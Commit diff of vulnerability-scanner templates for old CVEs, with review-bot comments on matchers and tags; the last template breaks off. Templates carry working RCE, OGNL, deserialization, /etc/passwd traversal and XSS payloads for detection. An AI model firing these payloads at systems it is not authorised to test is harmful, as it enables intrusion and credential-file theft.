reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
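Review bot: The word matcher (`OS`, `PATH`, `SHELL`, `USER`) is too generic to confirm command execution: these strings occur in ordinary pages, so any 200 response that happens to contain all four is reported. Match on output that only the executed function can produce. Separately, the tag `cvnd` looks like a typo for `cnvd` (the id and the other CNVD template in this commit use `cnvd`), the template has no `description`, and the path `/s=set&...` has no `?` before the parameters, which is worth confirming against the reference.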

View File

@ -12,24 +12,17 @@ requests:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
Accept-Encoding: deflate
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
extractors:
- type: regex

View File

@ -12,7 +12,6 @@ requests:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
@ -20,7 +19,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:
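Review bot: In the regex matcher, `root:.*:0:0` does not constrain the password field the way the `root:[x*]:0:0` line next to it does: `.*` is greedy and runs to the last `:0:0` on the line, so any line that mentions `root:` and later `:0:0` satisfies it. `root:[^:]*:0:0` still accepts shadowed, locked and hashed entries while keeping the passwd field layout. The same pattern recurs across the templates in this commit, so one shared form would be easier to maintain.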

View File

@ -4,9 +4,9 @@ info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference: |
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
@ -14,7 +14,6 @@ requests:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
@ -22,7 +21,6 @@ requests:
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");

View File

@ -0,0 +1,27 @@
id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft
requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
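Review bot: The matcher only shows that `/_vti_inf.html` references `_vti_bin/shtml.dll`, which indicates that FrontPage Server Extensions are installed, while the `description` is about disclosing the anonymous account name through an RPC POST to shtml.dll. State in the description that this is a presence check rather than a confirmation of CVE-2000-0114, so a hit is not read as a verified finding.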

View File

@ -0,0 +1,25 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-1"
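Review bot: `tags` uses `cves,cves2001`, while the other CVE templates in this commit use `cve,cve<year>`, so a run filtered on the `cve` tag skips this template; change it to `cve,cve2001`. The word `SSH-1` is also matched anywhere in the received data; a regex anchored to the start of the banner, such as `^SSH-1\.`, avoids matching unrelated text.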

View File

@ -0,0 +1,35 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
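Review bot: The `description` talks about the Virtual Keyboard plugin, but every path requested is a core page under `/src/` (addressbook.php, options.php, search.php, help.php) and the `name` refers to multiple XSS issues in 1.2.6/1.2.7. Align the description with what the requests actually test. `reference` is also a bare string here, while other templates in this commit use a list.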

View File

@ -0,0 +1,30 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
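Review bot: The path hard-codes a `/mail/` prefix (`{{BaseURL}}/mail/src/compose.php`), whereas the other SquirrelMail templates in this commit request `{{BaseURL}}/src/...`. An install served from the web root is missed; add `{{BaseURL}}/src/compose.php?mailbox=...` as a second path with `stop-at-first-match: true`, as CVE-2002-1131 does.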

View File

@ -5,7 +5,7 @@ info:
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference: |
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

View File

@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
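Review bot: Unlike the other XSS templates added in this commit, the matchers have no `part: header` check for `text/html`, so a reflection of the payload in a non-HTML response is reported as XSS. Add the header word matcher used in CVE-2002-1131 and CVE-2004-0519.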

View File

@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
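Review bot: The status matcher requires `200`, but the `description` says the script is injected through a malformed request that generates an HTTP 400 error page. With `matchers-condition: and`, a vulnerable server that answers 400 never matches; check for `400`, or drop the status matcher and rely on the body and header matchers. The body word matcher also lacks the explicit `part: body` that the sibling templates set.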

View File

@ -0,0 +1,25 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
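Review bot: The `name` and the `lfi` tag describe a local file inclusion in redirect.php, while the `description` is about PHP remote file inclusion in functions/plugin.php via the plugins array; say in the description how the `/src/redirect.php?plugins[]=` request relates to it. The regex here is `root:[x*]:0:0`, while other templates in this commit use `root:.*:0:0`; pick one form.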

View File

@ -0,0 +1,29 @@
id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

View File

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -15,14 +15,14 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

View File

@ -0,0 +1,32 @@
id: CVE-2007-5728
info:
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin
reference: https://www.exploit-db.com/exploits/30090
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
requests:
- method: GET
path:
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
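Review bot: The `pgadmin` tag names a different product; the target is phpPgAdmin, and CVE-2008-5587 in this commit tags it `phppgadmin`. Use `phppgadmin` here as well so tag-based selection covers both templates.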

View File

@ -21,5 +21,5 @@ requests:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"
part: body

View File

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2008-5587
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/exploits/7363
tags: cve2008,lfi,phppgadmin
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
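Review bot: `tags` lists `cve2008,lfi,phppgadmin` without the generic `cve` tag that the other CVE templates carry, so a `cve`-filtered run skips this template. The path also assumes the application lives under `/phpPgAdmin/`, while CVE-2007-5728 requests `{{BaseURL}}/redirect.php` directly; add a root-relative path as well.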

View File

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -17,4 +17,4 @@ requests:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"

View File

@ -0,0 +1,28 @@
id: CVE-2009-0932
info:
name: Horde - Horde_Image::factory driver Argument LFI
author: pikpikcu
severity: high
description: |
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -4,9 +4,10 @@ info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
@ -16,11 +17,7 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
@ -32,4 +29,4 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"

View File

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion 8 linked XSS vulnerabilies
author: princechaddha
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
tags: cve,cve2009,adobe,xss,coldfusion
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
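Review bot: `name` has a typo, `vulnerabilies`; it should read `vulnerabilities`. The `description` lists four vectors but only `_logintowizard.cfm` is requested, so either say that in the description or add the other paths with `stop-at-first-match: true`.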

View File

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
